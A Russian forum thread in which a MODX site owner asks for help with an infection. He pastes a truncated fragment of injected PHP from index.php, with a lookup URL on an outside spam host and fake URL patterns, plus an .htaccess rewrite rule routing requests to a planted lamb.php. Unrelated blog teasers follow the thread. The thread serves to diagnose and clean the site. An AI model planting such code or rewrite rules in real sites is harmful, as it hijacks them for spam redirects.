Вирусы на сайте в скриптах и коде PHP

@tohastar · Регистрация: 15.04.2017

Студворк — интернет-сервис помощи студентам

Здравствуйте! Сам занимаюсь продвижением сайтов. С новым на PHP столкнулся с проблемой. Приходит спам с одним и тем заголовком Узнать цену. Сайт на MODX... Стал разбираться обнаружил левые скрипты с помощью ai-bolit, убрал их, но не помогло. В index.php обнаружил левый код

PHP
1
2
3
4
5
6
7
8
9
10
<?php
$yumingid = 10;
$lineid = 936;
$locprefix = "";
$minlen = 2;
$maxlen = 8;
$jumpType = 0;
$is_static = 0;
$getloc = 'http://btuan01.xproduct05.top/junchi.php?yid=%d&lid=%d&jumpurl=%d&from=%s';
$urlrules = array('cooperative_blog_entry_@_lang-#_amc.$/', 'teamwork/urahara/latte_#/geoc_@/_smp_$/', 'produce-tmag-#-@-$-main-Newssid-pointmall/', '#.jsp/enterprise=$&rp=ryutsuu_/', 'management/Others_#/show_$/@-/', 'supervise/imagemodele/rose-#/ptusma-$/@/', '#.demand=$.@/', 'afid=#&@&require=$/', '@.pg=#/question=$-/', 'chiebukuro.#/@=$/benesse/', 'spotlight-directory-#/$-couponnumber-@/', 'catalogue/rum.daa.jp/?eid=#/nobilog=$/', 'COMMON/POST-#/ELNE-$/ODAI-@/MATOME/', 'spe******t=#/kokowoke=$/.@.medium/', 'professor_source_@_searchutm_#_medium_$_/', 'question_list/warpweb.#/osusu.$/recommend', 'config/login/#/$/', 'R/#_SPACE_$/', 'MEMAGREE/uroko/vm//sm/#/mynavi/$/asbs/', 'ABROAD-#.-$.-kuten@/', 'AUCTIONS.@/?P=#&G=$/', 'Flash_rita_ora_@_#_Shelly_$/', .....

+ строк 70, пытался его убрать и перестает показываться сайт.... Такой же код обнаружил сам в файлах 10 ai-bolit на них не реагировал. Искал в сети наткнулся что он есть на сайте http://www.unphp.net/decode/3b... 9fc75e114/ так и не понял для чего он.
Сам в PHP не специалист особо, поэтому спрашиваю у знатоков, что это за левак такой? И что сделать далее, чтобы убрать такой интересный вирус?

@Fart83 · 17.04.2017, 10:13

дыры в сайте, файл инъекции, через фтп и так далее. кстати и вы сами можете быть причиной заражения

@tohastar · 17.04.2017, 10:52 **[ТС]**

Дыры в сайте? Как Вы определили? В Чем может быть дыра? Вы знаете про этот вирус?, В поиске его совсем нет....
Файлов htaccess довольно много, в одном из них обнаружил

PHP
1
2
3
4
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^lamb[a-zA-Z0-9]+\/[0-9]+/[0-9]+.htm$ [B]lamb.php[/B] [L]
</IfModule>

Открыл тот файл там такая же левота как изначально... В index.php как этот код убрать? Вернее какую его часть требуется убрать, чтобы доступ к сайту не прекращался?

Добавлено через 2 минуты
Я вряд ли... С сайтом месяца нет, ссудя по файлам они попали в ноябре того года....

Новые блоги и статьи Все статьи Все блоги /
Автозаполнение реквизита при выборе элемента справочника Maks 27.03.2026 Программный код из решения ниже на примере нетипового документа "ЗаявкаНаРемонтСпецтехники" разработанного в конфигурации КА2. При выборе "Спецтехники" (Тип Справочник. Спецтехника), заполняется. . .	Сумматор с применением элементов трёх состояний. Hrethgir 26.03.2026 Тут. https:/ / fips. ru/ EGD/ ab3c85c8-836d-4866-871b-c2f0c5d77fbc Первый документ красиво выглядит, но без схемы. Это конечно не даёт никаких плюсов автору, но тем не менее. . . всё может быть. . .	Автозаполнение реквизитов при создании документа Maks 26.03.2026 Программный код из решения ниже размещается в модуле объекта документа, в процедуре "ПриСозданииНаСервере". Алгоритм проверки заполнения реализован для исключения перезаписи значения реквизита,. . .	Команды формы и диалоговое окно Maks 26.03.2026 1. Команда формы "ЗаполнитьЗапчасти". Программный код из решения ниже на примере нетипового документа "ЗаявкаНаРемонтСпецтехники" разработанного в конфигурации КА2. В качестве источника данных. . .
Кому нужен AOT? DevAlt 26.03.2026 Решил сделать простой ланчер Написал заготовку: dotnet new console --aot -o UrlHandler var items = args. Split(":"); var tag = items; var id = items; var executable = args;. . .	Отправка уведомления на почту при создании или изменении элементов справочника Maks 24.03.2026 Программная отправка письма электронной почты на примере типового справочника "Склады" в конфигурации БП3. Перед реализацией необходимо выполнить настройку системной учетной записи электронной. . .	модель ЗдравоСохранения 5. Меньше увольнений- больше дохода! anaschu 24.03.2026 Теперь система здравосохранения уменьшает количество увольнений. 9TO2GP2bpX4 a42b81fb172ffc12ca589c7898261ccb/ https:/ / rutube. ru/ video/ a42b81fb172ffc12ca589c7898261ccb/ Слева синяя линия -. . .	Midnight Chicago Blues kumehtar 24.03.2026 Такой Midnight Chicago Blues, знаешь?. . Когда вечерние улицы становятся ночными, а ты не можешь уснуть. Ты идёшь в любимый старый бар, и бармен наливает тебе виски. Ты смотришь на пролетающие. . .

@Fart83 321 / 189 / 78 Регистрация: 04.10.2016 Сообщений: 809
	17.04.2017, 10:13
	дыры в сайте, файл инъекции, через фтп и так далее. кстати и вы сами можете быть причиной заражения 0